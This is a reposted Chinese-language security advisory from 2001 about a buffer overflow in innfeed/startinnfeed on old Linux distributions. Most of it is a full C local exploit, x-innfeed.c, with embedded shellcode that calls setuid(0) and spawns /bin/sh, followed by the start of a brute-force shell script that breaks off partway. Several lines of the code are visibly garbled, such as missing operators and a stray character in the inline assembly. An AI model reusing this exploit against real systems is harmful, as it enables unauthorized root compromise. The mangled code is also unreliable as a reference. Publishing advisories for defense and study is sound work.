innfeed 缓冲区溢出漏洞

发布日期：2001-04-24
更新日期：2001-04-24

受影响系统：

Slackware 7.1 及更老的版本
Mandrake 7.0 及更老的版本
RedHat 7.2 及更老的版本

描述：

---

innfeed 程序是 NNTP 协议的一个实现。NNTP 是用来在计算机间传递新闻的协议。

由于没有作边界检查，在使用 -c 选项时发生缓冲区溢出。这使得可以完全控制堆栈，
并且把用户 ID 和组 ID 改为新闻组的用户 ID 和组 ID。

具体说来，溢出发生在程序里的 logOrPrint() 函数调用 logOrPrintf()时。由于
这个溢出，攻击者能够加入木马代码获取进一步的访问权，以此来提升权限，把自己
的用户 ID 和组 ID 改为新闻组的用户 ID 和组 ID。这样就对归新闻组所有的文件
得到拥有权限了，并且在某些情况下能够把文件换成木马。如果 root运行这些程序，
可能就要受到侵害了。

<* 来源：Enrique A. Sanchez Montellano
Alex Hernandez (alex.hernandez@defcom.com)
*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

--- x-innfeed.c ---
/*
x-innfeed.c

Buffer overflow in innfeed being called from startinnfeed
renders uid(news) gid(news), startinnfeed is suid root so
I have to also check if I can manage to get root out of
this ....

Enrique A. Sanchez Montellano
(@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET 0
#define ALIGN 0
#define BUFFER 470

// MANDRAKE, REDHAT, etc....

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */

/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
file://static char shellcode[]=
file://"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"

file://"\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[] =
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0"
"\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

unsigned long get_sp(void)
{
__asm__("movl %esp, 陎");
}

void usage(char *name)
{
printf("Usage: %s <offset> <align> <buffer>\n", name);
printf("Defcom Labs @ Spain ...\n");
printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
exit(0);
}

int main(int argc, char **argv)
{
char *code;
int offset = OFFSET;
int align = ALIGN;
int buffer = BUFFER;
unsigned long addr;
int i;

if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffer = atoi(argv[3]);

code = (char *)malloc(buffer);

printf("[ ] innfeed buffer overflow (passed to startinnfeed) [ ]\n");
printf("------------------------------------------------------------\n");
printf("[ ] Found by: \n\n[ ] Alex Hernandez"
"(alex.hernandez@defcom.com)\n"
"[ ] Enrique Sanchez (@defcom.com ... "
"Yes is just @defcom.com)\n");
printf("[ ] Defcom Labs @ Spain ....\n");
printf("[ ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

addr = get_sp() - offset;

printf("[ ] Using address 0x%x\n", addr);

for (i = 0; i <= buffer; i = 4) {
*(long *)&code[i] = 0x90909090;
}

*(long *)&code[buffer - 4] = addr;
*(long *)&code[buffer - 8] = addr;

memcpy(code buffer - strlen(shellcode) - 8 - align,
shellcode, strlen(shellcode));

printf("[ ] Starting exploitation ... \n\n");

// REDHAT, MANDRAKE ...
#ifdef REDHAT
execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

// SLACKWARE
#ifdef SLACKWARE
execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

return 0;
}
--- x-innfeed.c ---

--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有